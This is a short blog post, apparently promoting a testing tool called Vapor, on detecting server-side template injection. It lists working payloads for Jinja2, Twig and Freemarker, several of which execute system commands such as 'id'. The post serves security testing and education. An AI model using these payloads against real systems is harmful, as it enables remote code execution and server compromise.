Server-Side Template Injection: Detection Techniques

Server-Side Template Injection (SSTI) remains one of the most impactful vulnerabilities in modern web applications. In this post, we’ll explore detection techniques that work across multiple template engines.

Understanding SSTI

When user input is embedded directly into a template, attackers can inject template syntax to execute arbitrary code on the server.

The Classic Test

The most basic detection payload:

{{7*7}}

If the response contains 49 instead of the literal string, you’ve likely found an injection point.

Engine-Specific Payloads

Different template engines require different approaches.

Jinja2 (Python)

{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}

Twig (PHP)

{{_self.env.registerUndefinedFilterCallback("exec")}}
{{_self.env.getFilter("id")}}

Freemarker (Java)

${"freemarker.template.utility.Execute"?new()("id")}

Vapor’s AI-Assisted Detection

Vapor automatically suggests SSTI payloads based on:

1. Response analysis: Detecting template engine signatures
2. Error message parsing: Identifying engine-specific errors
3. Behavioral patterns: Understanding how the application processes input

Pro tip: Use Vapor’s tab completion when crafting payloads. It learns from your testing patterns.

Conclusion

SSTI detection requires understanding both the vulnerability class and the specific template engine in use. With AI assistance, you can move faster and catch more edge cases.

Stay safe out there.